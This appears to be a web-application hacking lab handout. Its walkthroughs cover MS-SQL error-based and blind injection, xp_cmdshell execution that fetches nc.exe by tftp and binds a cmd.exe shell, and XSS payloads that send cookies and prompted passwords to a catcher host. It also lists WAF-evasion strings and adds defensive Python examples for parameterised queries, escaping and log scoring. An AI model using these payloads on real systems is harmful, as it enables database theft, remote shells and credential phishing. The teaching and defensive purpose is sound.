- ################
- # Find/Replace #
- ################
- yourname -- Replace this with your name
- 172.16.0.180 -- Replace this with the instructor ip
- Win2K-WebApp-Host -- Replace this with the webapp host ip
- 56789 -- Replace with a port that is not in use by another student
- #########################################################################################
- # Basic SQL Injection Walkthrough #
- # ------------------------------ #
- # A good reference for syntax is located at: #
- # http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet #
- #########################################################################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2
- Notice the parameter passing:
- Books.asp ? STechID = 2
- The ? lets you know that the site is using parameter passing. In this case the site is passing the
- parameter name (STechID) and the parameter value (2) to the database.
- Parameter Name = STechID
- Parameter Value = 2
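Why a parameter value like STechID can rewrite the query, and what the fix looks like. This is an added example, not the lab's Books.asp code: it uses SQLite in memory as a stand-in for the lab's MS-SQL database, with a constructed Books table.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the lab's book database (SQLite here, MS-SQL in the lab);
    # only the title "Professional ASP" is taken from the walkthrough, the rest is made up.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Books (BookID INTEGER, STechID INTEGER, Title TEXT)")
    conn.executemany("INSERT INTO Books VALUES (?, ?, ?)", [
        (1, 1, "Professional ASP"),
        (2, 2, "SQL Server Programming"),
        (3, 3, "Java Networking"),
    ])
    return conn

def books_vulnerable(conn, stech_id):
    # The Books.asp pattern: the raw STechID string is pasted into the SQL text, so
    # anything after the number ("2 or 1=1--") becomes part of the query's logic.
    sql = "SELECT Title FROM Books WHERE STechID = " + stech_id
    return [row[0] for row in conn.execute(sql)]

def books_fixed(conn, stech_id):
    # Two independent defences: STechID is numeric, so reject anything that is not an
    # integer, and bind the value with a placeholder so the driver sends it as data,
    # never as SQL. Stacked statements (";exec ..." / "; IF ... WAITFOR") cannot be
    # smuggled through a bound parameter.
    try:
        value = int(stech_id)
    except ValueError:
        raise ValueError("STechID must be an integer") from None
    rows = conn.execute("SELECT Title FROM Books WHERE STechID = ?", (value,))
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = make_db()
    print(books_vulnerable(db, "2 or 1=1--"))   # every title: the tautology wins
    try:
        books_fixed(db, "2 or 1=1--")
    except ValueError as err:
        print("rejected:", err)
```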
- ###############################################
- # ERROR SQL INJECTION - EXTRACT DATABASE USER #
- ###############################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT user)--
- Syntax error converting the nvarchar value '[DB USER]' to a column of data type int.
- ##################################################
- # ERROR SQL INJECTION - EXTRACT DATABASE VERSION #
- ##################################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (select @@VERSION)--
- ###############################################
- # ERROR SQL INJECTION - EXTRACT DATABASE NAME #
- ###############################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT db_name())--
- Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.
- #############################################
- # ERROR SQL INJECTION - EXTRACT SERVER NAME #
- #############################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (@@SERVERNAME)--
- Syntax error converting the nvarchar value '[SERVER NAME]' to a column of data type int.
- Another option is:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT @@servername)--
- #########################################
- # ERROR SQL INJECTION - List DATABASES #
- #########################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(0))--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(1))--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(2))--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(3))--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(4))--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (SELECT DB_NAME(N))--
- #####################################################
- # ERROR SQL INJECTION - EXTRACT 1st DATABASE TABLE #
- #####################################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
- Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.
- ####################################################
- # ERROR SQL INJECTION - EXTRACT 2nd DATABASE TABLE #
- ####################################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'Books')--
- Syntax error converting the nvarchar value '[TABLE NAME 2]' to a column of data type int.
- ####################################################
- # ERROR SQL INJECTION - EXTRACT 3rd DATABASE TABLE #
- ####################################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'Buyers')--
- Syntax error converting the nvarchar value '[TABLE NAME 3]' to a column of data type int.
- ####################################################
- # ERROR SQL INJECTION - EXTRACT 4th DATABASE TABLE #
- ####################################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'Orders')--
- Syntax error converting the nvarchar value '[TABLE NAME 4]' to a column of data type int.
- ################################
- # Basic MS-SQL Blind Injection #
- ################################
- ###################################
- # BLIND SQL INJECTION - DETECTION #
- ###################################
- ###############################################
- # BLIND SQL INJECTION - EXTRACT DATABASE USER #
- ###############################################
- 3 - Total Characters
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- D - 1st Character
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- B - 2nd Character
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),2,1)))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- O - 3rd Character
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
- http://Win2K-WebApp-Host/book/Books.asp?STechID=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
- ##############################################
- # Executing System Commands With xp_cmdshell #
- ##############################################
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'ping -n 8 127.0.0.1'--
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'dir+>+c:\inetpub\wwwroot\book\dir_yourname.txt'--
- Check it
- --------
- http://Win2K-WebApp-Host/book/dir_yourname.txt
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'ipconfig+>+c:\inetpub\wwwroot\book\ipconfig_yourname.txt'--
- Check it
- --------
- http://Win2K-WebApp-Host/book/ipconfig_yourname.txt
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'netstat+>+c:\inetpub\wwwroot\book\netstat_yourname.txt'--
- Check it
- --------
- http://Win2K-WebApp-Host/book/netstat_yourname.txt
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'tftp -i 172.16.0.180 GET nc.exe c:\\yourname_nc.exe'--
- Go to the address below in firefox:
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1;exec+master..xp_cmdshell+'c:\\yourname_nc.exe -l -p 56789 -e cmd.exe'--
- Replace '56789' with a number between 1024 and 65535 that is not being used by another student in the class.
- Open a duplicate session in Putty and type the following:
- ---------------------------------------------------------
- nc Win2K-WebApp-Host 56789
- Replace '56789' with a number between 1024 and 65535 that is not being used by another student in the class.
- #################################
- # Really basic XSS walk-through #
- #################################
- 1. Use Firefox to browse to the following location:
- http://199.204.214.176/xss_practice/
- A really simple search page that is vulnerable should come up.
- 2. In the search box type:
- <script>alert('So this is XSS')</script>
- This should pop up an alert window with your message in it, proving XSS is in fact possible.
- 3. In the search box type:
- <script>alert(document.cookie)</script>
- This should pop up an alert window showing your cookie, proving that XSS is possible and that your cookie can be accessed.
- 4. Now replace that alert script with:
- <script>document.location="http://199.204.214.176/xss_practice/cookie_catcher.php?c="+document.cookie</script>
- This will actually pass your cookie to the cookie catcher that we have sitting on the web server.
- 5. Now view the stolen cookie at:
- http://199.204.214.176/xss_practice/cookie_stealer_logs.html
- The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
- ############################
- # A Better Way To Demo XSS #
- ############################
- Let's take this to the next level. We can modify this attack to include username/password collection. Paste all of this into the search box.
- Use Firefox to browse to the following location:
- http://199.204.214.176/xss_practice/
- Paste this in the search box
- ----------------------------
- Option 1
- --------
- <script>
- password=prompt('Your session is expired. Please enter your password to continue',' ');
- document.write("<img src=\"http://199.204.214.176/xss_practice/passwordgrabber.php?password=" +password+"\">");
- </script>
- Now view the captured password at:
- http://199.204.214.176/xss_practice/passwords.html
- Option 2
- --------
- <script>
- username=prompt('Please enter your username',' ');
- password=prompt('Please enter your password',' ');
- document.write("<img src=\"http://199.204.214.176/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
- </script>
- Now view the captured username and password at:
- http://199.204.214.176/xss_practice/username_password_logs.html
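How the xss_practice search page would be fixed so that the cookie catcher and the password-prompt payloads above render as harmless text. This is an added example, not the lab's own page code; the session cookie name and value are constructed.

```python
import html

def render_search_vulnerable(term):
    # xss_practice-style page: the search term is echoed into the HTML verbatim, so
    # <script>alert(document.cookie)</script> runs in the visitor's browser.
    return "<html><body><p>Results for: " + term + "</p></body></html>"

def render_search_fixed(term):
    # Output encoding for the HTML text context: html.escape turns < > & " ' into
    # entities, so the same input is displayed literally and never becomes a tag.
    return "<html><body><p>Results for: " + html.escape(term, quote=True) + "</p></body></html>"

def session_cookie_header(session_id):
    # HttpOnly hides the session cookie from document.cookie, which is exactly what the
    # cookie_catcher payload reads; Secure and SameSite limit other leakage paths.
    return f"Set-Cookie: ASPSESSIONID={session_id}; HttpOnly; Secure; SameSite=Lax"

def script_readable(set_cookie_line):
    # Mirrors what document.cookie exposes: the cookie is readable by page script
    # unless the HttpOnly attribute is present.
    attrs = [a.strip().lower() for a in set_cookie_line.split(":", 1)[1].split(";")]
    return "httponly" not in attrs[1:]

def has_active_script(page):
    # Crude check used to compare the two renderers: an unescaped <script tag survived.
    return "<script" in page.lower()

if __name__ == "__main__":
    payload = "<script>alert(document.cookie)</script>"   # from the walkthrough above
    print(render_search_vulnerable(payload))
    print(render_search_fixed(payload))
    print("readable by script:", script_readable(session_cookie_header("constructed-id")))
```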
- Tell me what each of these commands does (1 point per command), and whether it gets detected by the IDS:
- ------------------------------------------------------------------------------------------------
- Browse to the following URL:
- http://Win2K-WebApp-Host/book/
- In the Search box type each of the following:
- <script>alert('xss')</script>
- <script>alert(1)</script>
- <script>alert(String.fromCharCode(88,83,83))</script>
- %3Cscript%3E%28%27xss%27%29%3C$2Fscript%3E
- prompt('xss')
- prompt%28%27xss%27%29
- http://Win2K-WebApp-Host/book/
- Click "ASP"
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1
- Click "Professional ASP"
- http://Win2K-WebApp-Host/book/ViewBookDetails.asp?STechID=1&BookID=1
- Click "Write A Review"
- In the "Write Your Review" box type:
- <script>alert('xss')</script>
- http://Win2K-WebApp-Host/book/
- Click "ASP"
- http://Win2K-WebApp-Host/book/Books.asp?STechID=1
- Click "Professional ASP"
- http://Win2K-WebApp-Host/book/ViewBookDetails.asp?STechID=1&BookID=1
- Click "Upload Review"
- Create a file called yourname.txt and put the following text in it:
- <script>alert('xss')</script>
- Upload the newly created file
- ####################################
- # Web Application Firewall Evasion #
- ####################################
- Go to the addresses below in firefox:
- http://strategicsec.com/apt.exe
- http://strategicsec.com/nc.exe
- http://strategicsec.com/joe.exe
- http://strategicsec.com/cmd.exe
- What are the differences between each of the links above?
- Go to the address below in firefox:
- http://modsecurity.org/demo/crs-demo.html
- Insert the following payloads and keep track of the score each payload receives
- --------------------------------------------------------------------------------
- SQL Injection Payloads
- ----------------------
- ' or 1=1--
- ' or '1'='1--
- %27%201=1%2D%2D
- ' and 8<9--
- %27%20and%208<9%2D%2D
- Cross Site Scripting Payloads
- -----------------------------
- <script>alert('xss')</script>
- %3Cscript%3E%28%27xss%27%29%3C$2Fscript%3E
- prompt('xss')
- prompt%28%27xss%27%29
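A defender's counterpart to the ModSecurity scoring exercise, which also covers the blind WAITFOR and xp_cmdshell sections above: an added example (not CRS code, and its weights are constructed, not CRS values) that URL-decodes each value, scores it against signatures drawn from this walkthrough's payloads, and flags IIS-style log lines by score or by the lab's 10-second response time.

```python
import re
from urllib.parse import unquote_plus

# Signatures taken from the payloads used in this walkthrough. Weights are constructed
# to mimic the anomaly-score style of the ModSecurity CRS demo; they are not CRS values.
RULES = [
    ("sqli_boolean", re.compile(r"\b(or|and)\b\s*'?\d", re.I), 3),
    ("sqli_compare", re.compile(r"'?\d+'?\s*[=<>]\s*'?\d+"), 3),
    ("sqli_comment", re.compile(r"--"), 2),
    ("sqli_probe",   re.compile(r"@@version|@@servername|db_name\s*\(|sysobjects", re.I), 5),
    ("sqli_timing",  re.compile(r"\bwaitfor\s+delay\b", re.I), 5),
    ("sqli_cmdexec", re.compile(r"xp_cmdshell", re.I), 5),
    ("xss_tag",      re.compile(r"<\s*script\b", re.I), 5),
    ("xss_dialog",   re.compile(r"\b(alert|prompt)\s*\(", re.I), 3),
]

def normalize(raw):
    # Decode twice so %2D%2D becomes -- and a double-encoded payload is still seen;
    # unquote_plus also turns '+' into a space, as the web server would.
    return unquote_plus(unquote_plus(raw))

def score_payload(raw):
    """Return (anomaly score, names of the rules that matched) for one value."""
    text = normalize(raw)
    hits = [(name, weight) for name, rx, weight in RULES if rx.search(text)]
    return sum(w for _, w in hits), [n for n, _ in hits]

def score_log_lines(lines, threshold=5, slow_ms=10000):
    """Scan IIS W3C-extended lines (cs-uri-query is the 6th field, time-taken the 14th).
    A line is flagged when its query scores at or above threshold, or when a request
    carrying a SQL comment marker took as long as the lab's WAITFOR DELAY."""
    flagged = []
    for line in lines:
        f = line.split()
        if len(f) < 14:
            continue
        score, hits = score_payload(f[5])
        slow = int(f[13]) >= slow_ms and "sqli_comment" in hits
        if score >= threshold or slow:
            flagged.append((score, hits, slow))
    return flagged

# Constructed sample lines in IIS W3C format (not real server logs); queries are the lab's.
LOG_LINES = [
    "2012-03-01 10:00:01 10.0.0.5 GET /book/Books.asp STechID=2 80 - 10.0.0.9 Mozilla/5.0 200 0 0 15",
    "2012-03-01 10:00:07 10.0.0.5 GET /book/Books.asp STechID=2;+IF+(LEN(USER)=3)+WAITFOR+DELAY+'00:00:10'-- 80 - 10.0.0.9 Mozilla/5.0 200 0 0 10031",
    "2012-03-01 10:00:20 10.0.0.5 GET /book/Books.asp STechID=1;exec+master..xp_cmdshell+'ping+-n+8+127.0.0.1'-- 80 - 10.0.0.9 Mozilla/5.0 200 0 0 8040",
    "2012-03-01 10:00:31 10.0.0.5 GET /book/Books.asp STechID=2+or+1+in+(select+@@VERSION)-- 80 - 10.0.0.9 Mozilla/5.0 500 0 0 12",
]

if __name__ == "__main__":
    for p in ["' or 1=1--", "%27%201=1%2D%2D", "<script>alert('xss')</script>", "prompt%28%27xss%27%29"]:
        print(p, "->", score_payload(p))
    for entry in score_log_lines(LOG_LINES):
        print(entry)
```

Note that the encoded variant %27%201=1%2D%2D scores lower than ' or 1=1-- because it contains no OR keyword, which is the kind of difference the CRS demo exercise asks you to record.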